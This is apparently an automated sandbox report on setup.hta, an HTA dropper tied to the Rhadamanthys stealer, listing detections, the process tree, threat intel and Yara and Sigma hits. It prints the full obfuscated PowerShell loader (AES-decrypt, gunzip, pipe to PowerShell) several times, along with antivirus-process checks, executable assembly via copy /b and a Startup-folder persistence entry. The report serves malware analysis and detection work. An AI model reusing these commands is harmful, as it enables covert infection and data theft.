Edit tour

Windows Analysis Report
setup.hta

Overview

General Information

Sample name:	setup.hta
Analysis ID:	1395895
MD5:	bde81fba29e56db0dd8fe36fffa8c3c0
SHA1:	3da0fb3b154eefc03ad4448b5d5809d8c3d22061
SHA256:	79ae52b1bbf60846666893fa94f3a07252156d6ee385fc3bd8aab3370eea1ca7
Tags:	hta
Infos:

Detection

RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected RHADAMANTHYS Stealer

Contains functionality to register a low level keyboard hook

Drops PE files with a suspicious file extension

Found suspicious powershell code related to unpacking or dynamic code loading

Powershell drops PE file

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Abnormal high CPU Usage

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file does not import any functions

PE file overlay found

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Gzip Archive Decode Via PowerShell

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 5444 cmdline: mshta.exe "C:\Users\user\Desktop\setup.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 4820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

chrome.exe (PID: 5248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1952,i,13972747378656180607,2639153371829192782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

WmiPrvSE.exe (PID: 7876 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

ClassroomEc.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Roaming\ClassroomEc.exe" MD5: 956D074F7C6BD174C43586F07892E820)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7812 cmdline: "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8008 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7956 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7616 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7704 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6768 cmdline: cmd /c md 30253 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7280 cmdline: cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 8156 cmdline: cmd /c copy /b Conf 30253\m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Identification.pif (PID: 8140 cmdline: 30253\Identification.pif 30253\m MD5: 848164D084384C49937F99D5B894253E)

cmd.exe (PID: 1960 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

PING.EXE (PID: 4676 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000013.00000003.2951803005.0000000000360000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000013.00000003.2953940198.00000000088F0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 4820	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xc763d:$b1: ::WriteAllBytes( 0xc7a6e:$b1: ::WriteAllBytes( 0x1a3ffb:$b1: ::WriteAllBytes( 0x1cef28:$b1: ::WriteAllBytes( 0x1e8264:$b1: ::WriteAllBytes( 0x1e8710:$b1: ::WriteAllBytes( 0xa31:$b2: ::FromBase64String( 0xa69:$b2: ::FromBase64String( 0xa3a0:$b2: ::FromBase64String( 0xa3d6:$b2: ::FromBase64String( 0x16fb4:$b2: ::FromBase64String( 0x16fea:$b2: ::FromBase64String( 0x3bfa9:$b2: ::FromBase64String( 0x3bfdd:$b2: ::FromBase64String( 0x3c71e:$b2: ::FromBase64String( 0x3c752:$b2: ::FromBase64String( 0x3cb2f:$b2: ::FromBase64String( 0x3dd51:$b2: ::FromBase64String( 0x46143:$b2: ::FromBase64String( 0x46177:$b2: ::FromBase64String( 0x48828:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 4408	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x89364:$b1: ::WriteAllBytes( 0x384a3:$s1: -join 0x38e99:$s1: -join 0xa4028:$s1: -join 0x1acd6f:$s1: -join 0x1b9e44:$s1: -join 0x1bd216:$s1: -join 0x1bd8c8:$s1: -join 0x1bf3b9:$s1: -join 0x1c15bf:$s1: -join 0x1c1de6:$s1: -join 0x1c2656:$s1: -join 0x1c2d91:$s1: -join 0x1c2dc3:$s1: -join 0x1c2e0b:$s1: -join 0x1c2e2a:$s1: -join 0x1c367a:$s1: -join 0x1c37f6:$s1: -join 0x1c386e:$s1: -join 0x1c3901:$s1: -join 0x1c3b67:$s1: -join
Process Memory Space: Identification.pif PID: 8140	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
19.3.Identification.pif.8b10000.9.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.3.Identification.pif.8b10000.9.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.3.Identification.pif.88f0000.8.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_4408.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x80:$b1: ::WriteAllBytes( 0xc69e:$s1: -join 0x5e4a:$s4: += 0x5f0c:$s4: += 0xa133:$s4: += 0xc250:$s4: += 0xc53a:$s4: += 0xc680:$s4: += 0x38638:$s4: += 0x386b8:$s4: += 0x3877e:$s4: += 0x387fe:$s4: += 0x389d4:$s4: += 0x38a58:$s4: += 0x23bc:$e4: Get-WmiObject 0x25ab:$e4: Get-Process 0x2603:$e4: Start-Process

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

